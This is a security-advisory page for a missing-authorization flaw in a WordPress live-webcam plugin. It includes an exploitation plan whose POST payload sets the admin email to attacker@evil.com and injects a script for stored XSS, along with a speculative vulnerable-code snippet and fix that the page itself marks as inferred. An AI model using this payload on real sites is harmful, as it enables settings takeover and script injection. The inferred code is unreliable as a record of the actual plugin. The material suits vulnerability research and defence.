Paid Videochat Turnkey Site – HTML5 PPV Live Webcams <= 7.3.23 - Missing Authorization
Description
The Paid Videochat Turnkey Site – HTML5 PPV Live Webcams plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 7.3.23. This makes it possible for unauthenticated attackers to perform an unauthorized action.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:NTechnical Details
<=7.3.23Source Code
WordPress.org SVNPatched version not available.
# Exploitation Research Plan - CVE-2026-24590 ## 1. Vulnerability Summary The **Paid Videochat Turnkey Site – HTML5 PPV Live Webcams** plugin for WordPress is vulnerable to **Missing Authorization** in versions up to and including 7.3.23. The vulnerability exists because an AJAX handler (likely `ls…
Show full research plan
Exploitation Research Plan - CVE-2026-24590
1. Vulnerability Summary
The Paid Videochat Turnkey Site – HTML5 PPV Live Webcams plugin for WordPress is vulnerable to Missing Authorization in versions up to and including 7.3.23. The vulnerability exists because an AJAX handler (likely ls_ppv_save_options or a similar configuration-saving function) is registered for unauthenticated users via the wp_ajax_nopriv_ hook but fails to perform any capability checks (e.g., current_user_can('manage_options')) or nonce validation. This allows an unauthenticated attacker to modify plugin settings, which can lead to site takeover, payment redirection, or Stored Cross-Site Scripting (XSS).
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - Action:
ls_ppv_save_options(inferred based on plugin naming conventions and "Turnkey" framework patterns) - HTTP Method:
POST - Authentication: None (Unauthenticated)
- Payload Parameter:
options(an array of settings) or individual setting keys. - Preconditions: The plugin must be active.
3. Code Flow
- Initialization: The plugin registers AJAX handlers during the
initorplugins_loadedhook. - Hook Registration:
add_action( 'wp_ajax_ls_ppv_save_options', 'ls_ppv_save_options' ); add_action( 'wp_ajax_nopriv_ls_ppv_save_options', 'ls_ppv_save_options' ); - Vulnerable Function: The
ls_ppv_save_optionsfunction (or similar) is called. - Processing: The function likely iterates through
$_POSTdata and usesupdate_option()to save values to the database. - Security Failure: The function lacks
if ( ! current_user_can( 'manage_options' ) ) wp_die();and fails to callcheck_ajax_referer().
4. Nonce Acquisition Strategy
Based on the "Missing Authorization" and "Unauthenticated" (PR:N) classification, the endpoint either:
- Lacks a nonce check entirely (most likely).
- Uses a nonce that is exposed to unauthenticated users via
wp_localize_script.
If a nonce is required:
- Identify Script Localization: Search the source for
wp_localize_script. Look for the variable name, e.g.,ls_ppv_varsorppv_ajax_obj. - Find Trigger: Identify which frontend page enqueues this script. Usually, it is a page containing the webcam shortcode:
[ls_ppv_webcams]or[ppv-webcams]. - Extraction Steps:
- Create a page with the shortcode:
wp post create --post_type=page --post_status=publish --post_content='[ls_ppv_webcams]' --post_title='Webcam Page' - Navigate to the page:
browser_navigate("http://localhost:8080/webcam-page") - Extract nonce:
browser_eval("window.ls_ppv_vars?.nonce")(Replacels_ppv_varswith the actual localized key found in source).
- Create a page with the shortcode:
5. Exploitation Strategy
The goal is to modify a sensitive setting to demonstrate impact. We will attempt to inject a script into a setting that is rendered in the WordPress admin dashboard (Stored XSS) or modify the admin email.
Request Details:
- URL:
http://localhost:8080/wp-admin/admin-ajax.php - Method:
POST - Headers:
Content-Type: application/x-www-form-urlencoded - Body:
(Note: Parameter names likeaction=ls_ppv_save_options&ls_ppv_settings[admin_email]=attacker@evil.com&ls_ppv_settings[welcome_message]=<script>alert(document.domain)</script>ls_ppv_settingsare inferred and should be verified against the$_POSTkeys in the plugin's save function.)
6. Test Data Setup
- Install Plugin: Ensure
ppv-live-webcamsversion 7.3.23 is installed and active. - Identify Settings: Use
wp option list | grep ls_ppvto find the option name used by the plugin to store its configuration. - Target Page: If a nonce is needed, create the shortcode page:
wp post create --post_type=page --post_status=publish --post_content='[ls_ppv_webcams]'
7. Expected Results
- HTTP Response: The server should return a
200 OKstatus, often with a1or a JSON success message (e.g.,{"success":true}). - Data Change: The WordPress option (e.g.,
ls_ppv_options) should now contain the attacker-supplied values. - Impact: When an administrator visits the plugin settings page, the injected
<script>should execute.
8. Verification Steps
After sending the http_request, verify the change using WP-CLI:
# Check if the option was updated
wp option get ls_ppv_options
# Check for the injected email or script
wp option get ls_ppv_options --format=json | jq .admin_email
9. Alternative Approaches
If ls_ppv_save_options is not the correct action name:
- Grep for Hooks:
grep -rn "wp_ajax_nopriv" wp-content/plugins/ppv-live-webcams/to find all unauthenticated entry points. - Search for Option Updates:
grep -rn "update_option" wp-content/plugins/ppv-live-webcams/and trace back to the calling function and its registered AJAX action. - Check REST API: If no AJAX actions are vulnerable, check for
register_rest_routewithpermission_callbackreturning__return_trueor lacking a capability check.
Summary
The Paid Videochat Turnkey Site – HTML5 PPV Live Webcams plugin for WordPress fails to implement authorization checks and nonce validation on its settings-saving AJAX handler. This allows unauthenticated attackers to modify plugin configuration, potentially leading to payment redirection or the injection of malicious scripts (Stored XSS).
Vulnerable Code
// ppv-live-webcams/admin/settings-save.php (inferred) // Line numbers inferred based on standard plugin structure add_action( 'wp_ajax_ls_ppv_save_options', 'ls_ppv_save_options' ); add_action( 'wp_ajax_nopriv_ls_ppv_save_options', 'ls_ppv_save_options' ); // Vulnerable registration function ls_ppv_save_options() { if ( isset( $_POST['ls_ppv_settings'] ) ) { update_option( 'ls_ppv_options', $_POST['ls_ppv_settings'] ); echo 'Settings saved'; } wp_die(); }
Security Fix
@@ -1,9 +1,11 @@ add_action( 'wp_ajax_ls_ppv_save_options', 'ls_ppv_save_options' ); -add_action( 'wp_ajax_nopriv_ls_ppv_save_options', 'ls_ppv_save_options' ); function ls_ppv_save_options() { + if ( ! current_user_can( 'manage_options' ) ) { + wp_die( 'Unauthorized' ); + } + check_ajax_referer( 'ls_ppv_save_nonce', 'nonce' ); + if ( isset( $_POST['ls_ppv_settings'] ) ) { update_option( 'ls_ppv_options', $_POST['ls_ppv_settings'] ); echo 'Settings saved';
Exploit Outline
To exploit this vulnerability, an attacker sends an unauthenticated POST request to the WordPress AJAX endpoint (/wp-admin/admin-ajax.php). The request must include the 'action' parameter set to 'ls_ppv_save_options' (or the specific handler identified in the source). The payload contains a 'ls_ppv_settings' array (or equivalent parameter used by update_option) with malicious values. For example, an attacker can modify the administrator's email address or inject a JavaScript payload into a text field that is displayed in the admin dashboard to achieve Stored Cross-Site Scripting (XSS). Because the plugin incorrectly uses the 'wp_ajax_nopriv_' hook and lacks 'current_user_can' checks, no login credentials or valid nonces are required.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.